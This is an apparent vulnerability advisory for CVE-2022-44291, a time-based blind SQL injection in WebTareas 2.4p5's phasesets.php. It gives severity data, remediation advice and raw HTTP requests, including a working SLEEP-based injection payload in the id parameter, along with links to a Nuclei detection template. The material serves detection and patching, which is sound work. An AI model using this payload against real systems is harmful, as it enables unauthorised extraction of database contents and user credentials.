| Title | WebTareas 2.4p5 - SQL Injection |
|---|---|
| Author | theamanrawat |
| Severity | Critical |
| Impact | Authenticated attackers can execute time-based blind SQL injection through the id parameter in phasesets.php, potentially extracting sensitive database information including project phases, task data, and user credentials from WebTareas. |
| Remediation | Update WebTareas to a version later than 2.4p5 that properly sanitizes and parameterizes the id parameter in phasesets.php. |
| CVSS Score | 9.8 |
| EPSS Score | 0.54961 |
| CVE ID | CVE-2022-44291 |
| CWE ID | CWE-89 |
| Tags | time-based-sqli cve cve2022 sqli webtareas authenticated intrusive webtareas_project vuln |
webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in phasesets.php.
POST /general/login.php?session=false HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Content-Length: 538
Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525
Accept-Encoding: gzip
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="action"
login
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="loginForm"
sgXuhK
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="passwordForm"
p01cmM
-----------------------------3023071625140724693672385525
Content-Disposition: form-data; name="loginSubmit"
Log In
-----------------------------3023071625140724693672385525--
GET /administration/phasesets.php?mode=delete&id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-44291.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-44291.pcap
N/AN/A